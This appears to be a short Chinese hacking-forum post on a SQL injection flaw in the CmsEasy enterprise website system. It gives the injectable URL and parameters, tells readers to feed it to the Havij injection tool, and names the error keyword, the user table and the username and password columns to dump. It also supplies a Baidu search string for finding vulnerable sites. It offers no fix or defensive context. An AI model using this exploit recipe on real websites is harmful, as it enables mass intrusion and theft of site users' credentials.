CmsEasy易通企業網站系統最新注入漏洞

易通企業網站系統最新注入漏洞。

 
注入EXP:
 
http://www.xxx.com/celive/js/include.php?cmseasylive=1111&departmentid=0
 
直接放Havij裏面跑。錯誤關鍵字:online.gif
 
添加表名:cmseasy_user
 
列表:userid,username,password
 
百度關鍵字:Powered by CmsEasy

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章